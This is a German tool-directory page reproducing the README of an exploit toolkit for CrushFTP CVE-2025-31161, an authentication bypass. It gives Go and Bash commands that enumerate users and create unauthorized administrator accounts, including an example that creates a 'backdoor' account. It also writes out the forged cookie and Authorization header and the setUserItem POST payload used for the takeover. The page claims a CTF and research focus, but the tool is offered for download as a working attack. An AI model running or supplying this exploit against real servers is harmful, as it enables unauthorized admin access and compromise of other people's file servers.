Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CrushFTP-auth-bypass-CVE-2025-31161 — Exploit für CrushFTP CVE-2025-31161 Auth-Bypass: erkennt verwundbare Ziele, listet Benutzer auf und erstellt unbefugte Admin-Konten durch manipulierte HTTP-Anfragen in Go und Bash. | Kitploit
Tools/GitHubGitHub/0xdtc/crushftp-auth-bypass-cve-2025-31161
Authentifizierung & AutorisierungPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Red Teaming
GitHub0xdtc/crushftp-auth-bypass-cve-2025-31161

CrushFTP-auth-bypass-CVE-2025-31161

Exploit für CrushFTP CVE-2025-31161 Auth-Bypass: erkennt verwundbare Ziele, listet Benutzer auf und erstellt unbefugte Admin-Konten durch manipulierte HTTP-Anfragen in Go und Bash.

Repository anzeigen
9vor 0 JahrenNoch nicht geprüft

CrushFTP Authentifizierungs-Bypass - CVE-2025-31161

License: MIT CVE Go Bash

Ein umfassendes Toolkit zur Ausnutzung von CVE-2025-31161, einer Authentifizierungs-Bypass-Schwachstelle in CrushFTP, die das Erstellen nicht autorisierter Benutzerkonten ermöglicht.

🔍 Was ist CVE-2025-31161?

CVE-2025-31161 ist eine kritische Authentifizierungs-Bypass-Schwachstelle in CrushFTP, die es Angreifern ermöglicht, ohne ordnungsgemäße Authentifizierung nicht autorisierte Benutzerkonten zu erstellen. Diese Schwachstelle existiert in der Benutzerverwaltungsfunktion der Weboberfläche.

Technische Details

  • CVSS-Score: TBD
  • Betroffene Software: CrushFTP-Weboberfläche
  • Angriffsvektor: Netzwerk
  • Erforderliche Authentifizierung: Keine
  • Auswirkung: Vollständige Kompromittierung des Systems durch Erstellung nicht autorisierter Konten

🚀 Funktionen

  • Mehrsprachige Unterstützung: Implementierungen in Go und Bash
  • Intelligente Schwachstellenerkennung: Überprüft automatisch, ob das Ziel verwundbar ist, bevor der Exploit ausgeführt wird
  • Benutzerenumeration: Vorhandene Benutzer auf verwundbaren Zielen auflisten
  • Benutzererstellung: Neue administrative Konten erstellen
  • Interaktiver Modus: Fordert nur dann zur Eingabe von Anmeldedaten auf, wenn das Ziel als verwundbar bestätigt wurde
  • Kurzform-Flags: Schneller Zugriff mit den Flags -t, -p, -tu
  • Unterstützung benutzerdefinierter Ports: Konfigurierbarer Port für verschiedene Bereitstellungsszenarien
  • Bildungsschwerpunkt: Entwickelt für CTF-Herausforderungen und Sicherheitsforschung

📁 Repository-Struktur

CrushFTP-auth-bypass-CVE-2025-31161/
├── README.md                 # Diese Dokumentation
├── cve-2025-31161.go        # Go-Implementierung (empfohlen)
├── cve-2025-31161.sh        # Bash-Implementierung
└── LICENSE                  # MIT-Lizenz

🛠️ Installation und Voraussetzungen

Voraussetzungen

Für die Go-Version (empfohlen)

# Go installieren (falls nicht bereits geschehen)
sudo apt install golang-go
# oder
wget https://go.dev/dl/go1.21.0.linux-amd64.tar.gz
sudo tar -C /usr/local -xzf go1.21.0.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin

Für die Bash-Version

# Erfordert curl (normalerweise vorinstalliert)
sudo apt install curl

Schnelle Einrichtung

git clone <repository-url>
cd CrushFTP-auth-bypass-CVE-2025-31161
chmod +x cve-2025-31161.sh

🎯 Verwendung

Go-Version (empfohlen)

Benutzer auflisten

# Grundlegende Verwendung mit Kurzform-Flags
go run cve-2025-31161.go -t example.com -lu

# Mit benutzerdefiniertem Port
go run cve-2025-31161.go -t example.com -p 8080 -lu

# Lange Form der Flags
go run cve-2025-31161.go --target_host example.com --port 8080 -lu

Neuen Benutzer hinzufügen

# Neuen Benutzer erstellen (fragt nach Benutzername/Passwort)
go run cve-2025-31161.go -t example.com -au

# Mit benutzerdefiniertem Zielbenutzer (Standard: crushadmin)
go run cve-2025-31161.go -t example.com -tu admin -au

# Lange Form der Flags
go run cve-2025-31161.go --target_host example.com --target_user admin -au

Bash-Version

Benutzer auflisten

# Grundlegende Verwendung
./cve-2025-31161.sh -t example.com -lu

# Mit benutzerdefiniertem Port
./cve-2025-31161.sh -t example.com -p 8080 -lu

Neuen Benutzer hinzufügen

# Neuen Benutzer erstellen
./cve-2025-31161.sh -t example.com -au

# Mit benutzerdefinierten Einstellungen
./cve-2025-31161.sh -t example.com -p 8080 -tu crushadmin -au

Verfügbare Flags

FlagLange FormBeschreibungStandard
-t--target_hostZiel-Hostname oder IP (erforderlich)-
-p--portZiel-Port80
-tu--target_userZielbenutzer für den Exploitcrushadmin
-lu--list-usersVorhandene Benutzer auflisten-
-au--add-userNeuen Benutzer hinzufügen (interaktiv)-
--helpHilfemeldung anzeigen-

Beispiele zur Verwendung

# Beispiel 1: Benutzer auf Ziel auflisten
go run cve-2025-31161.go -t ftp.example.htb -lu

# Beispiel 2: Hintertürkonto erstellen
go run cve-2025-31161.go -t ftp.example.htb -au
# Dann eingeben: username: backdoor, password: P@ssw0rd123

# Beispiel 3: Nicht standardmäßiger Port mit Benutzerenumeration
./cve-2025-31161.sh -t 192.168.1.100 -p 9090 -lu

# Hilfe anzeigen
./cve-2025-31161.sh --help

🔄 Funktionsweise

flowchart TD
    A[Start Exploit] --> B[Check Target Connectivity]
    B --> C{Target Reachable?}
    C -->|No| D[Exit: Connection Failed]
    C -->|Yes| E[Send getUserList Request]
    E --> F{Response Contains OK?}
    F -->|No| G[Exit: Not Vulnerable]
    F -->|Yes| H[Target is Vulnerable!]
    H --> I{Mode Selected?}
    I -->|List Users -lu| J[Parse XML Response]
    J --> K[Display User List]
    K --> L[Exit: Success]
    I -->|Add User -au| M[Prompt for Username]
    M --> N[Prompt for Password]
    N --> O[Send Warm-up Request]
    O --> P[Craft User Creation Payload]
    P --> Q[Send setUserItem Request]
    Q --> R{User Created Successfully?}
    R -->|Yes| S[Success: Account Created]
    R -->|No| T[Failed: Exploitation Failed]

    style A fill:#e1f5fe
    style H fill:#c8e6c9
    style K fill:#81c784
    style S fill:#4caf50
    style D fill:#ffcdd2
    style G fill:#ffcdd2
    style T fill:#ffcdd2

🧪 Erklärung des Exploit-Ablaufs

Schritt 1: Schwachstellenerkennung

Das Skript sendet zuerst eine getUserList-Anfrage, um zu überprüfen, ob das Ziel verwundbar ist:

GET /webinterface/function/?command=getUserList&serverGroup=MainUsers&c2f=wIwV
Cookie: CrushAuth=1758816957058_vuiPVygdYnM1kzYGOs9d3tzIbFWIwV
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

Wenn die Antwort <response_status>OK</response_status> enthält, ist das Ziel verwundbar.

Schritt 2a: Benutzerenumeration (Modus „Benutzer auflisten“)

Bei Verwendung des Flags -lu analysiert das Skript die XML-Antwort und extrahiert die Benutzernamen:

<user_list type="vector">
    <user_list_subitem>ben</user_list_subitem>
    <user_list_subitem>crushadmin</user_list_subitem>
    <user_list_subitem>default</user_list_subitem>
</user_list>

Ausgabe:

[+] Users:
  - ben
  - crushadmin
  - default

Schritt 2b: Erstellung von Benutzerkonten (Modus „Benutzer hinzufügen“)

Bei Verwendung des Flags -au sendet das Skript eine setUserItem-Anfrage mit schädlicher XML-Nutzlast:

POST /webinterface/function/
Content-Type: application/x-www-form-urlencoded

command=setUserItem&data_action=replace&serverGroup=MainUsers&username=newuser&user=<USER_XML>&xmlItem=user&vfs_items=<VFS_XML>&permissions=<PERMISSIONS_XML>&c2f=31If

Schritt 3: Überprüfung

Das Skript sucht in der Antwort nach <response_status>OK</response_status>, um die erfolgreiche Benutzererstellung zu bestätigen.


⚠️ Details zur Schwachstelle

Grundursache

Die Schwachstelle resultiert aus unzureichenden Authentifizierungsprüfungen in der Benutzerverwaltungsfunktion der CrushFTP-Weboberfläche. Die Anwendung akzeptiert Anfragen zur Benutzererstellung, ohne die Berechtigungen des Aufrufers ordnungsgemäß zu validieren.

Auswirkungsbewertung

  • Vertraulichkeit: HOCH - Nicht autorisierter Zugriff auf das Dateisystem
  • Integrität: HOCH - Möglichkeit, Dateien zu ändern/hochzuladen
  • Verfügbarkeit: MITTEL - Potenzial für Ressourcenerschöpfung
Tool herunterladen